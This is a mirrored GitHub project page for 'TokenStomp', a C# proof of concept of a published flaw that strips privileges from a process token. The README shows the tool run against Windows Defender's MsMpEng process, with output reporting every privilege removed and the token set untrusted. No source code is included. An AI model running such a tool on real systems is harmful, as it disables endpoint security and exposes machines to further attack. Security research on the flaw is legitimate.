GithubHelp home page GithubHelp logo

h1d3r / tokenstomp Goto Github PK

View Code? Open in Web Editor NEW

This project forked from martiningesen/tokenstomp

0.0 0.0 0.0 103 KB

C# implementation of the token privilege removal flaw discovered by @GabrielLandau/Elastic

C# 100.00%

tokenstomp's Introduction

TokenStomp

C# POC for the token privilege removal flaw reported by @GabrielLandau at Elastic.

C:\Users\Mrtn>TokenStomp.exe MsMpEng

  ________           ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄   ▄ ▄▄▄▄▄▄▄ ▄▄    ▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄   ▄▄ ▄▄▄▄▄▄▄
 (____ / <|         █       █       █   █ █ █       █  █  █ █       █       █       █  █▄█  █       █
 (___ /  <|         █▄     ▄█   ▄   █   █▄█ █    ▄▄▄█   █▄█ █  ▄▄▄▄▄█▄     ▄█   ▄   █   █   █    ▄  █
 (__ /   <`-------.   █   █ █  █ █  █      ▄█   █▄▄▄█       █ █▄▄▄▄▄  █   █ █  █ █  █       █   █▄█ █
 /  `.    ^^^^^ |  \  █   █ █  █▄█  █     █▄█    ▄▄▄█  ▄    █▄▄▄▄▄  █ █   █ █  █▄█  █  ▄ ▄  █    ▄▄▄█
|     \---------'   | █   █ █       █    ▄  █   █▄▄▄█ █ █   █▄▄▄▄▄█ █ █   █ █       █ ██▄██ █   █
|______|___________/] █▄▄▄█ █▄▄▄▄▄▄▄█▄▄▄█ █▄█▄▄▄▄▄▄▄█▄█  █▄▄█▄▄▄▄▄▄▄█ █▄▄▄█ █▄▄▄▄▄▄▄█▄█   █▄█▄▄▄█
[▄▄▄▄▄|`-.▄▄▄▄▄▄▄▄▄]               Implemented by @Mrtn9 - Technique by @GabrielLandau

[*] Found MsMpEng with pid 4988
[*] Got handle to process
[*] Successfully opened process token
[*] Got token information
[*] Found 14 privileges in token
[*] Successfully removed 14 of 14 privileges from token
[*] Successfully set token untrusted

C:\Users\Mrtn>

Proof of Concept screenshot

Credits

tokenstomp's People

Contributors

flangvik avatar martiningesen avatar notmedic avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.